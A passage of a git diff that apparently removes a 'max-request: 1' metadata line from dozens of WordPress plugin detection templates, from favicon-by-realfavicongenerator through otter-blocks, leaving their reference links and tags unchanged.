b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ 